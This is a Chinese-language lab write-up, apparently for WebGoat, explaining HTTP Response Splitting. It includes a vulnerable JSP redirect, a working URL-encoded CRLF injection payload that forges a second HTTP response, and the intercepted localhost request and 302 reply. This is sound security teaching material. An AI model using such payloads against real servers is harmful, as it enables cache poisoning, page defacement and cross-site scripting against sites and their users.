第一小節:HTTP Basics:使用Proxy軟件(例如Webscarab)來截斷瀏覽器(客戶端)和Server之間的HTTP通信,之后任意篡改得到預期結果即可。
第二小節:HTTP Splitting:(其實應該為HTTP Response Splitting)
分為兩步
1、HTTP Splitting:通過注入HTTP request使得Server返回兩個HTTP response(最起碼是使得接收到Server返回響應的目標自己認為是接收到了兩個HTTP response),而不是一個。通過精心構造這第二個HTTP響應,攻擊者可以達到任意目的!該攻擊是因為server沒有檢查非法的數據輸入就進行了 請求的重定向(code 3x x , "setcookie" 或者 "Location")。
2、Cache Poisoning;
HTTP Response Splitting介紹:
“HTTP Response Splitting” is a new application attack technique which enables various new attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and an old favorite, cross-site scripting (XSS). This attack technique, and the derived attacks from it, are relevant to most web environments and is the result of the application’s failure to reject illegal user input, in this case, input containing malicious or unexpected characters.
HTTP Response Splitting漏洞成因:
The HTTP response splitting vulnerability is the result of the application’s failure to
reject illegal user input. Specifically, input containing malicious or unexpected CR
and LF characters.
HTTP Response Splitting攻擊發生的前提條件是——Server存在安全漏洞時,即Server沒有拒絕客戶端的非法輸入,並且Server腳本將用戶輸入的數據直接嵌入了HTTP response headers中。
並且,
HTTP1.1允許客戶端和服務器在一個相同的TCP會話中交換多個HTTP請求,而HTTP1.0在每個HTTP交換之前都必需建立一個TCP連接。
HTTP Response Splitting攻擊中的角色分析:
1、Web Server(具有可促使HTTP Response Splitting的安全漏洞)
2、Victim Target:一個能與Web Server正常交互的客戶端(在WebGoat中也由Attacker來扮演)。可以為一個browser(一般具有瀏覽器cache)或者一個cache server(forward/reverse proxy)
3、Attacker——發啟攻擊者
HTTP Response Splitting攻擊本質:
The essence of HTTP Response Splitting is the attacker’s ability to send a single HTTP request that forces the web server to form an output stream, which is then interpreted by the target as two HTTP responses instead of one response, in the normal case. The first response may be partially controlled by the attacker, but this is less important. What is material is that the attacker completely controls the form of the second response from the HTTP status line to the last byte of the HTTP response body. Once this is possible, the attacker realizes the attack by sending two requests through the target. The first one invokes two responses from the web server, and the second request would typically be to some “innocent” resource on the web server. However, the second request would be matched, by the target, to the second HTTP response, which is fully controlled by the attacker. The attacker, therefore, tricks the target into believing that a particular resource on the web server (designated by the second request) is the server’s HTTP response (server content), while it is in fact some data, which is forged by the attacker through the web server – this is the second response.
HTTP Response Splitting攻擊簡析:
HTTP Response Splitting attacks take place where the server script embeds user data in HTTP response headers. This typically happens when the script embeds user data in the redirection URL of a redirection response (HTTP status code 3xx), or when the script embeds user data in a cookie value or name when the response sets a cookie.
即Server沒有拒絕客戶端的非法輸入,並且Server腳本將用戶輸入的數據直接嵌入了HTTP response headers中。
server腳本將用戶輸入數據嵌入到HTTP redirection Response(HTTP status code 3xx)的重定向URL地址中(Location line)或者當response設置cookie時sever腳本將用戶輸入數據嵌入到cookie value/name中。
例子:
考慮以下JSP頁面 (假設在/redir_lang.jsp):
<%
response.sendRedirect("/by_lang.jsp?lang="+
request.getParameter("lang"));
%>
當使用參數lang=English調用/redir_lang.jsp時,server會自動重定向到/by_lang.jsp?lang=English
HTTP響應和請求包格式(需調研!!!!)
CR = Carriage return ( %0d or /r or A SCII 1 3)
LF = Line Feed (%0a or /n or A SCII 1 0)
http is built as follow:
initial line, ends with CRLF
header lines, ends with CRLF
blank line (= CRLF)
body
因為數據要被解析為HTTP請求因此用CRLF替換LF。
HTTP Response Splitting攻擊過程
在Webgoat測試頁的輸入框中輸入畸形數據:
chinese%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2029%0d%0a%0d%0a<html>Hacked by ZhengC</html>
可以在http://yehg.net/encoding/#中經URL解碼查看數據內容,即:
chinese
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 29
<html>Hacked by ZhengC</html>
這里需要注意的是 構建此畸形數據的時候要符合HTTP請求和響應的包格式。比如HTTP請求和響應都需要用CRLF(即%0d%0a)來隔開數據包的header和body。
而target解析到Content-Length: 0時,認為請求包的body內容為空,因此Content-Length: 0相當於將一個GET請求數據包中間截斷為一個內容為0的GET請求和下面的數據包(我們精心構造為一個HTTP200響應)。
Webscarab截獲POST請求和Server的Response
需要設置WebScarab
The Request sent to Server is:
POST http://localhost:8080/webgoat/lessons/General/redirect.jsp?Screen=3&menu=100 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://localhost:8080/webgoat/attack?Screen=3&menu=100&Restart=3
Cookie: JSESSIONID=2CF8DFAB32C4CF39DB4023D1BB2EF98E
Content-Type: application/x-www-form-urlencoded
Content-length: 245
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
language=chinese%250d%250aContent-Length%3A%25200%250d%250a%250d%250aHTTP%2F1.1%2520200%2520OK%250d%250aContent-Type%3A%2520text%2Fhtml%250d%250aContent-Length%3A%252029%250d%250a%250d%250a%3Chtml%3EHacked+by+ZhengC%3C%2Fhtml%3E&SUBMIT=Search%21
Server sent response(302)to proxy:
HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Location: http://localhost:8080/webgoat/attack?Screen=3&menu=100&fromRedirect=yes&language=chinese%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2029%0d%0a%0d%0a<html>Hacked by ZhengC</html>
Content-Type: text/html;charset=ISO-8859-1
Content-length: 0
Date: Wed, 27 Oct 2010 06:18:13 GMT
